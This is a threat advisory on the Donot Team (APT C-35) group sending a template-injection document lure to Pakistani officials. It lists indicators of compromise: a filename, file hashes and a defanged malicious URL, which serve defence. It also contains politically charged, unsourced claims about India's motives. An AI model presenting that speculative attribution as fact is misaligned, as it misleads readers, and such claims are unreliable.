Rewterz Threat Advisory – CVE-2021-27077 – Microsoft Windows privilege escalation
March 10, 2021Rewterz Threat Advisory – Multiple F5 BIG-IP Security Vulnerabilities
March 11, 2021Rewterz Threat Advisory – CVE-2021-27077 – Microsoft Windows privilege escalation
March 10, 2021Rewterz Threat Advisory – Multiple F5 BIG-IP Security Vulnerabilities
March 11, 2021Severity
High
Analysis Summary
APT C-35 aka (Donot Team) has been actively dropping malicious RTF sample for template injection. The group has a history of attacking Pakistani government officials and military personnel and has been linked to India. They previously targeted Pakistani users with android malware named (StealJob) was used to target Pakistani android mobile users by Phishing on the name of “Kashmiri Voice” The attackers hunt for confidential information and intellectual property. The hackers’ targets include countries in South Asia, in particular, state sector of Pakistan.
The file name suggests that the malicious attachment is about the “Brief Report on International Boarder ” which iterates the reporting done on the international border and the activities on it. These type of reports are shared with highest level officials and the content in it is use to develop strategic planning. These kind of attacks are now in full flow to disintegrate Pakistan after Pakistan started performing better interms of economy and getting themselves retain in the FATF grey list where as India pushed Pakistan to the wire to be inducted to blacklist so they can take advantage of the situation and get their gain in the region.
Impact
Information theft and Espionage
Indicators of Compromise
Filename
- Brief Report on International Boarder l 301-2(6[.]doc
MD5
- d8f19b4b3b74cf6f4cb2482c4dc88d37
SHA-256
- d417fe805ec25443ea2a0999f398ebacb6e366f7de69442757614cad2d36dc90
SHA1
- a15d011bed98bce65db597ffd2d5fde49d46cfa2
URL
- http[:]//firm[.]tplinkupdates[.]space/
Remediation
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.